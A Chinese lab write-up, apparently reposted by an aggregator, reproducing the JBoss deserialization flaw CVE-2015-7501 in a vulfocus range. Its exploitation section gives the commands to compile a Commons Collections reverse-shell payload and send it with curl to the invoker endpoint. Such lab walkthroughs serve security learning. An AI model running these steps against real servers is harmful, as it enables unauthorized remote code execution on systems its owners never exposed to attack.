JBOSS 反序列化(CVE-2015-7501)复现

Posted 恸.283

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了JBOSS 反序列化(CVE-2015-7501)复现相关的知识,希望对你有一定的参考价值。

1、产品简介

Red Hat JBoss Application Server(AS,也称WildFly)是美国红帽(Red Hat)公司的一款基于JavaEE的开源的应用服务器,它具有启动超快、轻量、模块化设计、热部署和并行部署、简洁管理、域管理及第一类元件等特性。

2、漏洞概述

JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,可以通过Apache Commons Collections中的Gadget执行任意代码。

3、影响范围

红帽 JBoss A-MQ 6.x;BPM 套件 (BPMS) 6.x;BRMS 6.x 和 5.x;数据网格(JDG)6.x;数据虚拟化 (JDV) 6.x 和 5.x;企业应用平台 6.x、5.x 和 4.3.x;保险丝 6.x; 保险丝维修工程 (FSW) 6.x;运营网络(JBoss ON)3.x;传送门 6.x;SOA 平台 (SOA-P) 5.x;网络服务器(JWS)3.x;红帽 OpenShift/xPAAS 3.x;和 Red Hat Subscription Asset Manager 1.3

4、利用流程

1、打开vulfocus靶场访问IP

2、开启kali下载漏洞环境 下载地址:https://github.com/ianxtianxt/CVE-2015-7501/

解压 并提权

3、kali没有带javac命令,需要自己下载相关配置

(1)使用命令安装jdk apt install default-jdk

(2)执行

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

(3)执行

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port

完成后生成一个ReverseShellCommonsCollectionsHashMap.ser文件,注意这里的ip和端口就是反弹到服务器的ip和监听的端口。

4、开启监听

5、在kali执行命令进行反弹shell curl http://vulfocus.fofa.so:60494/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

6、反弹shell成功

以上是关于JBOSS 反序列化(CVE-2015-7501)复现的主要内容,如果未能解决你的问题,请参考以下文章

每日安全资讯通过JBoss反序列化(CVE-2017-12149)浅谈Java反序列化漏洞

动手实验JBoss 反序列化漏洞

玩转漏洞JBOSS反序列化漏洞探索

JBoss反序列化漏洞(CVE-2017-12149)分析

靶场科普 | 中间件之Jboss反序列化漏洞

漏洞预警JBoss再次曝出反序列化高危漏洞(CVE-2017-12149)